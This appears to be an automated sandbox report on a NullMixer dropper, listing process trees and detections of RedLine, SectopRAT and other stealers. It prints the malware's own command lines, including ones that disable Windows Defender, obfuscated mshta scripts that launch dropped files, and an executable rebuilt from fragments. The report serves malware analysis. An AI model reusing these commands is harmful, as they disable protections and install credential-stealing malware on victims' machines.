PID 3228 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 3936 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2164 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1540 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2676 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 2496 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 3228 wrote to memory of 1012 N/A C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe C:\Windows\SysWOW64\cmd.exe
PID 2424 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
PID 2424 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
PID 2424 wrote to memory of 1836 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe
PID 2288 wrote to memory of 4980 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe

Processes

C:\Users\Admin\AppData\Local\Temp\setup_installer.exe

"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe

"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\setup_install.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19879c4c0e.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19325eb008c0b950.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue195c40958f528163.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19f51bcd77a.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1993b3f72c.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue193858933525b62.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19150ee2be694c8a4.exe /mixone

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue192762f1cd058ddf8.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19411ac950924ec3f.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c78ded4d176ac.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19c1338f41ab.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue19b4ef3b53293fe.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c06f159e0ec.exe

Tue19c06f159e0ec.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3228 -ip 3228

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1993b3f72c.exe

Tue1993b3f72c.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe

Tue193858933525b62.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19150ee2be694c8a4.exe

Tue19150ee2be694c8a4.exe /mixone

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe

Tue19879c4c0e.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19325eb008c0b950.exe

Tue19325eb008c0b950.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue192762f1cd058ddf8.exe

Tue192762f1cd058ddf8.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c1338f41ab.exe

Tue19c1338f41ab.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19411ac950924ec3f.exe

Tue19411ac950924ec3f.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe

Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue1969586bcbf58493.exe

Tue1969586bcbf58493.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19b4ef3b53293fe.exe

Tue19b4ef3b53293fe.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe

Tue19761b3b8d9d.exe

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3228 -s 620

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe

Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19c78ded4d176ac.exe

Tue19c78ded4d176ac.exe

C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-IDINK.tmp\Tue19879c4c0e.tmp" /SL5="$100030,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe"

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if """" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19f51bcd77a.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19761b3b8d9d.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue195c40958f528163.exe

C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe

"C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT

C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp

"C:\Users\Admin\AppData\Local\Temp\is-T76J3.tmp\Tue19879c4c0e.tmp" /SL5="$70110,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue19879c4c0e.exe" /SILENT

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "" == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\7zS09F8C297\Tue193858933525b62.exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 2852 -ip 2852

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2852 -s 360

C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe

~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ

C:\Windows\SysWOW64\taskkill.exe

taskkill -iM "Tue193858933525b62.exe" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" VbscrIPt: CLOsE( crEATeObjEcT( "wsCRipt.SheLl" ). RUN ( "C:\Windows\system32\cmd.exe /q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if ""-PyARgXd6fRp1GJRov7bdbpPssZBLJ "" == """" for %x In ( ""C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe"" ) do taskkill -iM ""%~nXx"" /f " , 0 , TRuE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /q /C tYPe "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe" > ~Xy1GPomKV09sC.Exe && stART ~Xy1gPomkV09sC.eXe -PyARgXd6fRp1GJRov7bdbpPssZBLJ &if "-PyARgXd6fRp1GJRov7bdbpPssZBLJ " == "" for %x In ( "C:\Users\Admin\AppData\Local\Temp\~Xy1GPomKV09sC.Exe") do taskkill -iM "%~nXx" /f

C:\Windows\SysWOW64\mshta.exe

"C:\Windows\System32\mshta.exe" vBscrIpt: cLosE ( cREatEObjEcT ( "wscript.sHeLl" ). Run ( "cMD.ExE /R ECHO | seT /P = ""MZ"" > F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E " , 0 , TruE ) )

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\System32\cmd.exe" /R ECHO | seT /P = "MZ" >F3U_R.J & CoPy /B /Y F3U_R.J + RqC~~.A + TfSAy.w + y5ULsw.L6+ AobbVRP.2Y + WvAi.2 BENCc.E & Start msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /f /im chrome.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" ECHO "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /S /D /c" seT /P = "MZ" 1>F3U_R.J"

C:\Windows\SysWOW64\msiexec.exe

msiexec -Y .\bENCc.E

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /im chrome.exe

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x11c,0x120,0x124,0xf8,0x128,0x7ffaddeccc40,0x7ffaddeccc4c,0x7ffaddeccc58

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1924,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1920 /prefetch:2

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2156,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2188 /prefetch:3

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2256,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2272 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3152,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3172 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3296,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3316 /prefetch:1

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe

"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4568 /prefetch:1

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4708,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4720 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4712,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4688 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4976,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3728 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3292,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4716 /prefetch:8

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5244,i,14093976459940165328,12896074352318300665,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:8

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Windows\system32\dwm.exe

"dwm.exe"

Network


Files


Analysis: behavioral21

Detonation Overview

Submitted

2024-11-10 17:24

Reported

2024-11-10 17:27

Platform

win7-20240903-en

Max time kernel

149s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062a0488e6dd1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06384ea2548.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\500e7e5c009d6087e16c49251fe574108267633fa8a0a72b489e07a7056ae644.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\setup_install.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0625413f2fb.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06d8092a5ae.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed06dffacb42ccf1c.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067ba5199af5f.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068cfd71e196da.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed068a6c101a0e81.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed062272ee8a02b1746.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed0639114ac9fa.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2TOLQ.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS028D4896\Wed067fa7edd4b875a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-MCLIP.tmp\Wed067fa7edd4b875a.tmp N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\05XkvF6f.EXe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
